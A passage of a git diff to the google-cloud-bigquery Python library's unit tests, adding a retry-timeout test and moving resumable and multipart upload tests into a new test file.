for call in client._connection.api_request.call_args_list: + _, kwargs = call + assert kwargs["method"] == "POST" + assert kwargs["path"] == request_path + + +def test_query_and_wait_retries_job_times_out(global_time_lock): + with freezegun.freeze_time(auto_tick_seconds=100): + conn = helpers.make_connection( + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + ) + client = helpers.make_client(project="client-project") + client._connection = conn + + with pytest.raises(google.api_core.exceptions.RetryError) as exc_info: + _job_helpers.query_and_wait( + client, + query="SELECT 1", + location="request-location", + project="request-project", + job_config=None, + page_size=None, + max_results=None, + retry=retries.Retry( + lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), + multiplier=1.0, + ).with_deadline( + 200.0 + ), # Since auto_tick_seconds is 100, we should get at least 1 retry. + job_retry=retries.Retry( + lambda exc: isinstance( + exc, google.api_core.exceptions.InternalServerError + ), + multiplier=1.0, + ).with_deadline(400.0), + ) + + assert isinstance( + exc_info.value.cause, google.api_core.exceptions.InternalServerError + ) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index c3cf33279..213f382dc 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -16,7 +16,6 @@ import collections import datetime import decimal -import email import gzip import http.client import io @@ -28,13 +27,10 @@ from unittest import mock import warnings -import freezegun import packaging import pytest import requests -import google.api - try: import opentelemetry @@ -58,8 +54,6 @@ import google.cloud._helpers from google.cloud import bigquery -from google.cloud.bigquery import job as bqjob -import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference, Dataset from google.cloud.bigquery.enums import UpdateMode, DatasetView from google.cloud.bigquery import exceptions @@ -313,31 +307,6 @@ def test__call_api_extra_headers(self): headers = kwargs["headers"] assert headers["x-goog-request-reason"] == "because-friday" - def test__call_api_applying_custom_retry_on_timeout(self): - from concurrent.futures import TimeoutError - from google.cloud.bigquery.retry import DEFAULT_RETRY - - creds = _make_credentials() - client = self._make_one(project=self.PROJECT, credentials=creds) - - api_request_patcher = mock.patch.object( - client._connection, - "api_request", - side_effect=[TimeoutError, "result"], - ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, TimeoutError) - ) - - with api_request_patcher as fake_api_request: - result = client._call_api(retry, foo="bar") - - self.assertEqual(result, "result") - self.assertEqual( - fake_api_request.call_args_list, - [mock.call(foo="bar"), mock.call(foo="bar")], # was retried once - ) - def test__call_api_span_creator_not_called(self): from concurrent.futures import TimeoutError from google.cloud.bigquery.retry import DEFAULT_RETRY @@ -644,48 +613,6 @@ def test_get_service_account_email_w_alternate_project(self): ) self.assertEqual(service_account_email, email) - def test_get_service_account_email_w_custom_retry(self): - from google.cloud.bigquery.retry import DEFAULT_RETRY - - api_path = "/projects/{}/serviceAccount".format(self.PROJECT) - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - - resource = { - "kind": "bigquery#getServiceAccountResponse", - "email": "bq-123@bigquery-encryption.iam.gserviceaccount.com", - } - api_request_patcher = mock.patch.object( - client._connection, - "api_request", - side_effect=[ValueError, resource], - ) - - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, ValueError) - ) - - with api_request_patcher as fake_api_request: - with mock.patch( - "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" - ) as final_attributes: - service_account_email = client.get_service_account_email( - retry=retry, timeout=7.5 - ) - - final_attributes.assert_called_once_with({"path": api_path}, client, None) - self.assertEqual( - service_account_email, "bq-123@bigquery-encryption.iam.gserviceaccount.com" - ) - self.assertEqual( - fake_api_request.call_args_list, - [ - mock.call(method="GET", path=api_path, timeout=7.5), - mock.call(method="GET", path=api_path, timeout=7.5), # was retried once - ], - ) - def test_dataset_with_specified_project(self): from google.cloud.bigquery.dataset import DatasetReference @@ -3848,176 +3775,6 @@ def test_load_table_from_uri_w_default_load_config(self): timeout=DEFAULT_TIMEOUT, ) - @staticmethod - def _mock_requests_response(status_code, headers, content=b""): - return mock.Mock( - content=content, - headers=headers, - status_code=status_code, - spec=["content", "headers", "status_code"], - ) - - def _mock_transport(self, status_code, headers, content=b""): - fake_transport = mock.Mock(spec=["request"]) - fake_response = self._mock_requests_response( - status_code, headers, content=content - ) - fake_transport.request.return_value = fake_response - return fake_transport - - def _initiate_resumable_upload_helper(self, num_retries=None, mtls=False): - from google.resumable_media.requests import ResumableUpload - from google.cloud.bigquery.client import _DEFAULT_CHUNKSIZE - from google.cloud.bigquery.client import _GENERIC_CONTENT_TYPE - from google.cloud.bigquery.client import _get_upload_headers - from google.cloud.bigquery.job import LoadJob - from google.cloud.bigquery.job import LoadJobConfig - from google.cloud.bigquery.job import SourceFormat - - # Create mocks to be checked for doing transport. - resumable_url = "http://test.invalid?upload_id=hey-you" - response_headers = {"location": resumable_url} - fake_transport = self._mock_transport(http.client.OK, response_headers) - client = self._make_one(project=self.PROJECT, _http=fake_transport) - conn = client._connection = make_connection() - if mtls: - conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") - - # Create some mock arguments and call the method under test. - data = b"goodbye gudbi gootbee" - stream = io.BytesIO(data) - config = LoadJobConfig() - config.source_format = SourceFormat.CSV - job = LoadJob(None, None, self.TABLE_REF, client, job_config=config) - metadata = job.to_api_repr() - upload, transport = client._initiate_resumable_upload( - stream, metadata, num_retries, None - ) - - # Check the returned values. - self.assertIsInstance(upload, ResumableUpload) - - host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" - upload_url = ( - f"{host_name}/upload/bigquery/v2/projects/{self.PROJECT}" - "/jobs?uploadType=resumable" - ) - self.assertEqual(upload.upload_url, upload_url) - expected_headers = _get_upload_headers(conn.user_agent) - self.assertEqual(upload._headers, expected_headers) - self.assertFalse(upload.finished) - self.assertEqual(upload._chunk_size, _DEFAULT_CHUNKSIZE) - self.assertIs(upload._stream, stream) - self.assertIsNone(upload._total_bytes) - self.assertEqual(upload._content_type, _GENERIC_CONTENT_TYPE) - self.assertEqual(upload.resumable_url, resumable_url) - - retry_strategy = upload._retry_strategy - self.assertEqual(retry_strategy.max_sleep, 64.0) - if num_retries is None: - self.assertEqual(retry_strategy.max_cumulative_retry, 600.0) - self.assertIsNone(retry_strategy.max_retries) - else: - self.assertIsNone(retry_strategy.max_cumulative_retry) - self.assertEqual(retry_strategy.max_retries, num_retries) - self.assertIs(transport, fake_transport) - # Make sure we never read from the stream. - self.assertEqual(stream.tell(), 0) - - # Check the mocks. - request_headers = expected_headers.copy() - request_headers["x-upload-content-type"] = _GENERIC_CONTENT_TYPE - fake_transport.request.assert_called_once_with( - "POST", - upload_url, - data=json.dumps(metadata).encode("utf-8"), - headers=request_headers, - timeout=mock.ANY, - ) - - def test__initiate_resumable_upload(self): - self._initiate_resumable_upload_helper() - - def test__initiate_resumable_upload_mtls(self): - self._initiate_resumable_upload_helper(mtls=True) - - def test__initiate_resumable_upload_with_retry(self): - self._initiate_resumable_upload_helper(num_retries=11) - - def _do_multipart_upload_success_helper( - self, get_boundary, num_retries=None, project=None, mtls=False - ): - from google.cloud.bigquery.client import _get_upload_headers - from google.cloud.bigquery.job import LoadJob - from google.cloud.bigquery.job import LoadJobConfig - from google.cloud.bigquery.job import SourceFormat - - fake_transport = self._mock_transport(http.client.OK, {}) - client = self._make_one(project=self.PROJECT, _http=fake_transport) - conn = client._connection = make_connection() - if mtls: - conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") - - if project is None: - project = self.PROJECT - - # Create some mock arguments. - data = b"Bzzzz-zap \x00\x01\xf4" - stream = io.BytesIO(data) - config = LoadJobConfig() - config.source_format = SourceFormat.CSV - job = LoadJob(None, None, self.TABLE_REF, client, job_config=config) - metadata = job.to_api_repr() - size = len(data) - - response = client._do_multipart_upload( - stream, metadata, size, num_retries, None, project=project - ) - - # Check the mocks and the returned value. - self.assertIs(response, fake_transport.request.return_value) - self.assertEqual(stream.tell(), size) - get_boundary.assert_called_once_with() - - host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" - upload_url = ( - f"{host_name}/upload/bigquery/v2/projects/{project}" - "/jobs?uploadType=multipart" - ) - payload = ( - b"--==0==\r\n" - b"content-type: application/json; charset=UTF-8\r\n\r\n" - b"%(json_metadata)s" - b"\r\n" - b"--==0==\r\n" - b"content-type: */*\r\n\r\n" - b"%(data)s" - b"\r\n" - b"--==0==--" - ) % {b"json_metadata": json.dumps(metadata).encode("utf-8"), b"data": data} - - headers = _get_upload_headers(conn.user_agent) - headers["content-type"] = b'multipart/related; boundary="==0=="' - fake_transport.request.assert_called_once_with( - "POST", upload_url, data=payload, headers=headers, timeout=mock.ANY - ) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_mtls(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, mtls=True) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_with_retry(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, num_retries=8) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_with_custom_project(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, project="custom-project") - def test_copy_table(self): from google.cloud.bigquery.job import CopyJob @@ -5543,143 +5300,6 @@ def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails_no_retries(self job_retry=None, ) - def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404(self): - """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 - - Sometimes after a Conflict, the fetch fails with a 404, but we know - because of the conflict that really the job does exist. Retry until we - get the job status (or timeout). - """ - job_id = "abc123" - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - conn = client._connection = make_connection( - # We're mocking QueryJob._begin, so this is only going to be - # jobs.get requests and responses. - google.api_core.exceptions.TooManyRequests("this is retriable by default"), - google.api_core.exceptions.NotFound("we lost your job"), - google.api_core.exceptions.NotFound("we lost your job again, sorry"), - { - "jobReference": { - "projectId": self.PROJECT, - "location": "TESTLOC", - "jobId": job_id, - } - }, - ) - - job_create_error = google.api_core.exceptions.Conflict("Job already exists.") - job_begin_patcher = mock.patch.object( - bqjob.QueryJob, "_begin", side_effect=job_create_error - ) - job_id_patcher = mock.patch.object( - google.cloud.bigquery._job_helpers, - "make_job_id", - return_value=job_id, - ) - - with job_begin_patcher, job_id_patcher: - # If get job request fails there does exist a job - # with this ID already, retry 404 until we get it (or fails for a - # non-retriable reason, see other tests). - result = client.query("SELECT 1;", job_id=None) - - jobs_get_path = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - # Double-check that it was jobs.get that was called for each of our - # mocked responses. - [jobs_get_path] - * 4, - ) - assert result.job_id == job_id - - def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( - self, - ): - """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 - - Sometimes after a Conflict, the fetch fails with a 404. If it keeps - failing with a 404, assume that the job actually doesn't exist. - """ - job_id_1 = "abc123" - job_id_2 = "xyz789" - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - - # We're mocking QueryJob._begin, so that the connection should only get - # jobs.get requests. - job_create_error = google.api_core.exceptions.Conflict("Job already exists.") - job_begin_patcher = mock.patch.object( - bqjob.QueryJob, "_begin", side_effect=job_create_error - ) - conn = client._connection = make_connection( - google.api_core.exceptions.NotFound("we lost your job again, sorry"), - { - "jobReference": { - "projectId": self.PROJECT, - "location": "TESTLOC", - "jobId": job_id_2, - } - }, - ) - - # Choose a small deadline so the 404 retries give up. - retry = ( - google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) - ) - job_id_patcher = mock.patch.object( - google.cloud.bigquery._job_helpers, - "make_job_id", - side_effect=[job_id_1, job_id_2], - ) - retry_patcher = mock.patch.object( - google.cloud.bigquery.retry, - "_DEFAULT_GET_JOB_CONFLICT_RETRY", - retry, - ) - - with freezegun.freeze_time( - "2025-01-01 00:00:00", - # 10x the retry deadline to guarantee a timeout. - auto_tick_seconds=10, - ), job_begin_patcher, job_id_patcher, retry_patcher: - # If get job request fails there does exist a job - # with this ID already, retry 404 until we get it (or fails for a - # non-retriable reason, see other tests). - result = client.query("SELECT 1;", job_id=None) - - jobs_get_path_1 = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id_1}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - jobs_get_path_2 = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id_2}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - # Double-check that it was jobs.get that was called for each of our - # mocked responses. - [jobs_get_path_1, jobs_get_path_2], - ) - assert result.job_id == job_id_2 - def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_succeeds(self): from google.api_core.exceptions import Conflict from google.cloud.bigquery.job import QueryJob @@ -10032,213 +9652,6 @@ def test_load_table_from_json_unicode_emoji_data_case(self): assert sent_data_file.getvalue() == expected_bytes # Low-level tests - - @classmethod - def _make_resumable_upload_responses(cls, size): - """Make a series of responses for a successful resumable upload.""" - from google import resumable_media - - resumable_url = "http://test.invalid?upload_id=and-then-there-was-1" - initial_response = cls._make_response( - http.client.OK, "", {"location": resumable_url} - ) - data_response = cls._make_response( - resumable_media.PERMANENT_REDIRECT, - "", - {"range": "bytes=0-{:d}".format(size - 1)}, - ) - final_response = cls._make_response( - http.client.OK, - json.dumps({"size": size}), - {"Content-Type": "application/json"}, - ) - return [initial_response, data_response, final_response] - - @staticmethod - def _make_transport(responses=None): - import google.auth.transport.requests - - transport = mock.create_autospec( - google.auth.transport.requests.AuthorizedSession, instance=True - ) - transport.request.side_effect = responses - return transport - - def test__do_resumable_upload(self): - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - result = client._do_resumable_upload( - file_obj, self.EXPECTED_CONFIGURATION, None, None - ) - - content = result.content.decode("utf-8") - assert json.loads(content) == {"size": file_obj_len} - - # Verify that configuration data was passed in with the initial - # request. - transport.request.assert_any_call( - "POST", - mock.ANY, - data=json.dumps(self.EXPECTED_CONFIGURATION).encode("utf-8"), - headers=mock.ANY, - timeout=mock.ANY, - ) - - def test__do_resumable_upload_custom_project(self): - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - result = client._do_resumable_upload( - file_obj, - self.EXPECTED_CONFIGURATION, - None, - None, - project="custom-project", - ) - - content = result.content.decode("utf-8") - assert json.loads(content) == {"size": file_obj_len} - - # Verify that configuration data was passed in with the initial - # request. - transport.request.assert_any_call( - "POST", - mock.ANY, - data=json.dumps(self.EXPECTED_CONFIGURATION).encode("utf-8"), - headers=mock.ANY, - timeout=mock.ANY, - ) - - initiation_url = next( - ( - call[0][1] - for call in transport.request.call_args_list - if call[0][0] == "POST" and "uploadType=resumable" in call[0][1] - ), - None, - ) # pragma: NO COVER - - assert initiation_url is not None - assert "projects/custom-project" in initiation_url - - def test__do_resumable_upload_custom_timeout(self): - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - client._do_resumable_upload( - file_obj, self.EXPECTED_CONFIGURATION, num_retries=0, timeout=3.14 - ) - - # The timeout should be applied to all underlying calls. - for call_args in transport.request.call_args_list: - assert call_args[1].get("timeout") == 3.14 - - def test__do_multipart_upload(self): - transport = self._make_transport([self._make_response(http.client.OK)]) - client = self._make_client(transport) - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - - client._do_multipart_upload( - file_obj, self.EXPECTED_CONFIGURATION, file_obj_len, None, None - ) - - # Verify that configuration data was passed in with the initial - # request. - request_args = transport.request.mock_calls[0][2] - request_data = request_args["data"].decode("utf-8") - request_headers = request_args["headers"] - - request_content = email.message_from_string( - "Content-Type: {}\r\n{}".format( - request_headers["content-type"].decode("utf-8"), request_data - ) - ) - - # There should be two payloads: the configuration and the binary daya. - configuration_data = request_content.get_payload(0).get_payload() - binary_data = request_content.get_payload(1).get_payload() - - assert json.loads(configuration_data) == self.EXPECTED_CONFIGURATION - assert binary_data.encode("utf-8") == file_obj.getvalue() - - def test__do_multipart_upload_wrong_size(self): - client = self._make_client() - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - - with pytest.raises(ValueError): - client._do_multipart_upload(file_obj, {}, file_obj_len + 1, None, None) - - def test_schema_from_json_with_file_path(self): - from google.cloud.bigquery.schema import SchemaField - - file_content = """[ - { - "description": "quarter", - "mode": "REQUIRED", - "name": "qtr", - "type": "STRING" - }, - { - "description": "sales representative", - "mode": "NULLABLE", - "name": "rep", - "type": "STRING" - }, - { - "description": "total sales", - "mode": "NULLABLE", - "name": "sales", - "type": "FLOAT" - } - ]""" - - expected = [ - SchemaField("qtr", "STRING", "REQUIRED", description="quarter"), - SchemaField( - "rep", - "STRING", - "NULLABLE", - description="sales representative", - ), - SchemaField( - "sales", - "FLOAT", - "NULLABLE", - description="total sales", - ), - ] - - client = self._make_client() - mock_file_path = "/mocked/file.json" - - open_patch = mock.patch( - "builtins.open", new=mock.mock_open(read_data=file_content) - ) - - with open_patch as _mock_file: - actual = client.schema_from_json(mock_file_path) - _mock_file.assert_called_once_with(mock_file_path) - # This assert is to make sure __exit__ is called in the context - # manager that opens the file in the function - _mock_file().__exit__.assert_called_once() - - assert expected == actual - def test_schema_from_json_with_file_object(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_client_bigframes.py b/tests/unit/test_client_bigframes.py index 0fcc31e40..0260da5e4 100644 --- a/tests/unit/test_client_bigframes.py +++ b/tests/unit/test_client_bigframes.py @@ -338,7 +338,7 @@ def test_query_and_wait_bigframes_with_jobs_insert_dry_run_no_callback(client): assert result.schema == [bigquery.SchemaField("_f0", "INTEGER")] -def test_query_and_wait_bigframes_with_query_retry_callbacks(client): +def test_query_and_wait_bigframes_with_query_retry_callbacks(client, global_time_lock): created = datetime.datetime( 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc ) diff --git a/tests/unit/test_client_resumable_media_upload.py b/tests/unit/test_client_resumable_media_upload.py new file mode 100644 index 000000000..642c18d15 --- /dev/null +++ b/tests/unit/test_client_resumable_media_upload.py @@ -0,0 +1,433 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from unittest import mock +import email +import http.client +import io +import json + +import pytest + +from google.cloud.bigquery.table import TableReference + +from .helpers import make_connection + + +PROJECT = "test-project" +TABLE_REF = TableReference.from_string(f"{PROJECT}.test_dataset.test_table") +EXPECTED_CONFIGURATION = { + "load": { + "destinationTable": { + "projectId": PROJECT, + "datasetId": "test_dataset", + "tableId": "test_table", + }, + "sourceFormat": "CSV", + } +} + + +@pytest.fixture(autouse=True) +def mock_sleep(monkeypatch): + sleep = mock.Mock() + monkeypatch.setattr("time.sleep", sleep) + + +def _make_credentials(): + import google.auth.credentials + + return mock.Mock(spec=google.auth.credentials.Credentials) + + +def _make_client(*args, **kw): + from google.cloud.bigquery.client import Client + + kw["credentials"] = _make_credentials() + kw["project"] = PROJECT + return Client(*args, **kw) + + +def _make_file_obj(contents=b"some data"): + return io.BytesIO(contents) + + +def _make_response(status_code, content=b"", headers=None): + response = mock.Mock(spec=["status_code", "content", "request", "headers"]) + response.status_code = status_code + response.content = content + response.headers = headers or {} + response.request = mock.Mock(spec=["headers"]) + return response + + +def _make_resumable_upload_responses(num_bytes): + # In a real scenario, the upload URL is returned in a 'Location' + # header. + return [ + _make_response( + http.client.OK, + headers={"location": "http://test.invalid/upload-id"}, + ), + _make_response( + http.client.OK, content=json.dumps({"size": num_bytes}).encode("utf-8") + ), + ] + + +def _make_transport(responses=None): + import google.auth.transport.requests + + transport = mock.create_autospec( + google.auth.transport.requests.AuthorizedSession, instance=True + ) + transport.request.side_effect = responses + return transport + + +def _mock_requests_response(status_code, headers, content=b""): + return mock.Mock( + content=content, + headers=headers, + status_code=status_code, + spec=["content", "headers", "status_code"], + ) + + +def _mock_transport(status_code, headers, content=b""): + fake_transport = mock.Mock(spec=["request"]) + fake_response = _mock_requests_response(status_code, headers, content=content) + fake_transport.request.return_value = fake_response + return fake_transport + + +def _initiate_resumable_upload_helper(num_retries=None, mtls=False): + from google.resumable_media.requests import ResumableUpload + from google.cloud.bigquery.client import _DEFAULT_CHUNKSIZE + from google.cloud.bigquery.client import _GENERIC_CONTENT_TYPE + from google.cloud.bigquery.client import _get_upload_headers + from google.cloud.bigquery.job import LoadJob + from google.cloud.bigquery.job import LoadJobConfig + from google.cloud.bigquery.job import SourceFormat + + # Create mocks to be checked for doing transport. + resumable_url = "http://test.invalid?upload_id=hey-you" + response_headers = {"location": resumable_url} + fake_transport = _mock_transport(http.client.OK, response_headers) + client = _make_client(_http=fake_transport) + conn = client._connection = make_connection() + if mtls: + conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") + + # Create some mock arguments and call the method under test. + data = b"goodbye gudbi gootbee" + stream = io.BytesIO(data) + config = LoadJobConfig() + config.source_format = SourceFormat.CSV + job = LoadJob(None, None, TABLE_REF, client, job_config=config) + metadata = job.to_api_repr() + upload, transport_out = client._initiate_resumable_upload( + stream, metadata, num_retries, None + ) + + # Check the returned values. + assert isinstance(upload, ResumableUpload) + + host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" + upload_url = ( + f"{host_name}/upload/bigquery/v2/projects/{PROJECT}/jobs?uploadType=resumable" + ) + assert upload.upload_url == upload_url + expected_headers = _get_upload_headers(conn.user_agent) + assert upload._headers == expected_headers + assert not upload.finished + assert upload._chunk_size == _DEFAULT_CHUNKSIZE + assert upload._stream is stream + assert upload._total_bytes is None + assert upload._content_type == _GENERIC_CONTENT_TYPE + assert upload.resumable_url == resumable_url + + retry_strategy = upload._retry_strategy + assert retry_strategy.max_sleep == 64.0 + if num_retries is None: + assert retry_strategy.max_cumulative_retry == 600.0 + assert retry_strategy.max_retries is None + else: + assert retry_strategy.max_cumulative_retry is None + assert retry_strategy.max_retries == num_retries + assert transport_out is fake_transport + # Make sure we never read from the stream. + assert stream.tell() == 0 + + # Check the mocks. + request_headers = expected_headers.copy() + request_headers["x-upload-content-type"] = _GENERIC_CONTENT_TYPE + fake_transport.request.assert_called_once_with( + "POST", + upload_url, + data=json.dumps(metadata).encode("utf-8"), + headers=request_headers, + timeout=mock.ANY, + ) + + +def test__initiate_resumable_upload(): + _initiate_resumable_upload_helper() + + +def test__initiate_resumable_upload_mtls(): + _initiate_resumable_upload_helper(mtls=True) + + +def test_initiate_resumable_upload_with_retry(): + _initiate_resumable_upload_helper(num_retries=11) + + +def _do_multipart_upload_success_helper( + get_boundary, num_retries=None, project=None, mtls=False +): + from google.cloud.bigquery.client import _get_upload_headers + from google.cloud.bigquery.job import LoadJob + from google.cloud.bigquery.job import LoadJobConfig + from google.cloud.bigquery.job import SourceFormat + + fake_transport = _mock_transport(http.client.OK, {}) + client = _make_client(_http=fake_transport) + conn = client._connection = make_connection() + if mtls: + conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") + + if project is None: + project = PROJECT + + # Create some mock arguments. + data = b"Bzzzz-zap \x00\x01\xf4" + stream = io.BytesIO(data) + config = LoadJobConfig() + config.source_format = SourceFormat.CSV + job = LoadJob(None, None, TABLE_REF, client, job_config=config) + metadata = job.to_api_repr() + size = len(data) + + response = client._do_multipart_upload( + stream, metadata, size, num_retries, None, project=project + ) + + # Check the mocks and the returned value. + assert response is fake_transport.request.return_value + assert stream.tell() == size + get_boundary.assert_called_once_with() + + host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" + upload_url = ( + f"{host_name}/upload/bigquery/v2/projects/{project}/jobs?uploadType=multipart" + ) + payload = ( + b"--==0==\r\n" + b"content-type: application/json; charset=UTF-8\r\n\r\n" + b"%(json_metadata)s" + b"\r\n" + b"--==0==\r\n" + b"content-type: */*\r\n\r\n" + b"%(data)s" + b"\r\n" + b"--==0==--" + ) % {b"json_metadata": json.dumps(metadata).encode("utf-8"), b"data": data} + + headers = _get_upload_headers(conn.user_agent) + headers["content-type"] = b'multipart/related; boundary="==0=="' + fake_transport.request.assert_called_once_with( + "POST", upload_url, data=payload, headers=headers, timeout=mock.ANY + ) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload(get_boundary): + _do_multipart_upload_success_helper(get_boundary) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload_mtls(get_boundary): + _do_multipart_upload_success_helper(get_boundary, mtls=True) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test_do_multipart_upload_with_retry(get_boundary): + _do_multipart_upload_success_helper(get_boundary, num_retries=8) + + +@mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") +def test__do_multipart_upload_with_custom_project(get_boundary): + _do_multipart_upload_success_helper(get_boundary, project="custom-project") + + +def test__do_resumable_upload(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + result = client._do_resumable_upload(file_obj, EXPECTED_CONFIGURATION, None, None) + + content = result.content.decode("utf-8") + assert json.loads(content) == {"size": file_obj_len} + + transport.request.assert_any_call( + "POST", + mock.ANY, + data=json.dumps(EXPECTED_CONFIGURATION).encode("utf-8"), + headers=mock.ANY, + timeout=mock.ANY, + ) + + +def test__do_resumable_upload_custom_project(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + result = client._do_resumable_upload( + file_obj, + EXPECTED_CONFIGURATION, + None, + None, + project="custom-project", + ) + + content = result.content.decode("utf-8") + assert json.loads(content) == {"size": file_obj_len} + + transport.request.assert_any_call( + "POST", + mock.ANY, + data=json.dumps(EXPECTED_CONFIGURATION).encode("utf-8"), + headers=mock.ANY, + timeout=mock.ANY, + ) + + initiation_url = next( + ( + call[0][1] + for call in transport.request.call_args_list + if call[0][0] == "POST" and "uploadType=resumable" in call[0][1] + ), + None, + ) + assert initiation_url is not None + assert "projects/custom-project" in initiation_url + + +def test__do_resumable_upload_custom_timeout(): + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + transport = _make_transport(_make_resumable_upload_responses(file_obj_len)) + client = _make_client(_http=transport) + + client._do_resumable_upload( + file_obj, EXPECTED_CONFIGURATION, num_retries=0, timeout=3.14 + ) + + for call_args in transport.request.call_args_list: + assert call_args[1].get("timeout") == 3.14 + + +def test__do_multipart_upload_request_body(): + transport = _make_transport([_make_response(http.client.OK)]) + client = _make_client(_http=transport) + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + + client._do_multipart_upload( + file_obj, EXPECTED_CONFIGURATION, file_obj_len, None, None + ) + + request_args = transport.request.mock_calls[0][2] + request_data = request_args["data"].decode("utf-8") + request_headers = request_args["headers"] + + request_content = email.message_from_string( + "Content-Type: {}\n{}".format( + request_headers["content-type"].decode("utf-8"), request_data + ) + ) + + configuration_data = request_content.get_payload(0).get_payload() + binary_data = request_content.get_payload(1).get_payload() + + assert json.loads(configuration_data) == EXPECTED_CONFIGURATION + assert binary_data.encode("utf-8") == file_obj.getvalue() + + +def test__do_multipart_upload_wrong_size(): + client = _make_client() + file_obj = _make_file_obj() + file_obj_len = len(file_obj.getvalue()) + + with pytest.raises(ValueError): + client._do_multipart_upload(file_obj, {}, file_obj_len + 1, None, None) + + +def test_schema_from_json_with_file_path(): + from google.cloud.bigquery.schema import SchemaField + + file_content = """ + [ + { + "description": "quarter", + "mode": "REQUIRED", + "name": "qtr", + "type": "STRING" + }, + { + "description": "sales representative", + "mode": "NULLABLE", + "name": "rep", + "type": "STRING" + }, + { + "description": "total sales", + "mode": "NULLABLE", + "name": "sales", + "type": "FLOAT" + } + ]""" + + expected = [ + SchemaField("qtr", "STRING", "REQUIRED", description="quarter"), + SchemaField( + "rep", + "STRING", + "NULLABLE", + description="sales representative", + ), + SchemaField( + "sales", + "FLOAT", + "NULLABLE", + description="total sales", + ), + ] + + client = _make_client() + mock_file_path = "/mocked/file.json" + + open_patch = mock.patch("builtins.open", new=mock.mock_open(read_data=file_content)) + + with open_patch as _mock_file: + actual = client.schema_from_json(mock_file_path) + _mock_file.assert_called_once_with(mock_file_path) + _mock_file.return_value.read.assert_called_once() + 